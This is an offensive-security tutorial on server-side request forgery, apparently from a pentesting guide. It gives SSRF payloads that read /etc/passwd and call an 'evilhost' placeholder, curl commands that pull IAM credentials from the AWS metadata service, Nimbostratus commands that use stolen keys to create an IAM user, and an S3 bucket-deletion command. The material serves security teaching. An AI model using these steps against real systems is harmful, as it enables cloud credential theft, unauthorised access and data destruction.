Server-side request forgery

In this section, I will explain what server-side request forgery is, describe some common examples, and explain how to find and exploit various kinds of SSRF vulnerabilities.

Server-side request forgery (SSRF) exploits the trusted relationship between a web server and other backend systems which are not normally accessible to an attacker (e.g. because of firewalls or application rules). They are particularly dangerous in cloud infrastructure like AWS, because SSRF allows an attacker to query internal services like Amazon's metadata API for credentials and other sensitive data.

Techniques

Basic

Generally, you'll be looking for poorly-sanitized parameters which accept URLs, either in GET or POST requests. Less well-known locations for SSRF include:

  • HTTP Referer header

  • Partial URLs in requests (assembled server-side)

In the examples below, localhost is used in the URL to access data and services which are only accessible via the local network.

Example GET request with a vulnerable open redirect:

http://[host]/page?url=http://localhost/api/getuser/id/1

Example POST request with a similarly unsanitized URL parameter:

POST /page HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

url=http://localhost:1234

Some SSRF attacks will return a response that you can see on the vulnerable website, but others may be blind.

You can also test protocols other than HTTP:

http://[host]/page.php?url=file:///etc/passwd
http://[host]/page.php?url=dict://[evilhost]:1234/
http://[host]/page.php?url=sftp://[evilhost]:1234/
http://[host]/page.php?url=ldap://localhost:1234/%0astats%0aquit

Attacking AWS with SSRF

Amazon's AWS has an internal metadata service which can be queried from any instance. Attackers can use SSRF vulnerabilities to retrieve instance information and in some cases make changes to the infrastructure. Amazon's CLI performs a similar function.

There are two metadata standards for the AWS API - the newest one requires you to generate a short-term token before issuing commands. However, the older non-token version does not seem to be going away, so you could simply use curl http://169.254.169.254/whatever to get the same data.

The following command from Amazon's metadata documentation allows you to generate a 6-hour token, save it in a variable and display the top-level metadata items:

TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` \
&& curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/

The top-level metadata items will look something like this:

ami-id
ami-launch-index
...
public-keys/
security-groups

From there, you can make calls to the API to view each of the metadata items in detail.

For example, the following command lets you view startup scripts for the instance, which may reveal credentials or paths to sensitive S3 buckets:

curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/user-data/

To view roles for the instance:

curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/

Once you have a role name, you can request credentials for that role:

curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/SomeRole

{
  "Code" : "Success",
  "LastUpdated" : "2019-12-03T18:08:16Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA...",
  "SecretAccessKey" : "V...",
  "Token" : "SomeBase64==",
  "Expiration" : "2019-12-04T00:17:43Z"
}

At this point you may want to consider automated AWS metadata enumeration tools like Nimbostratus to determine the permissions available to a role:

sudo python nimbostratus dump-permissions --access-key=ASIA... --secret-key=V...

You can also attempt to create a new user, as a proof-of-concept:

sudo python nimbostratus create-iam-user --access-key=ASIA... --secret-key=p...

Enumerating S3 buckets

The AWS CLI can be used to poke around connected S3 buckets. Some useful commands:

aws s3 mb s3://bucket-name            # create a bucket
aws s3 ls                             # list buckets
aws s3 ls s3://bucket-name            # list things in a bucket
aws s3 rb s3://bucket-name --force    # delete bucket + contents

Further reading

Last updated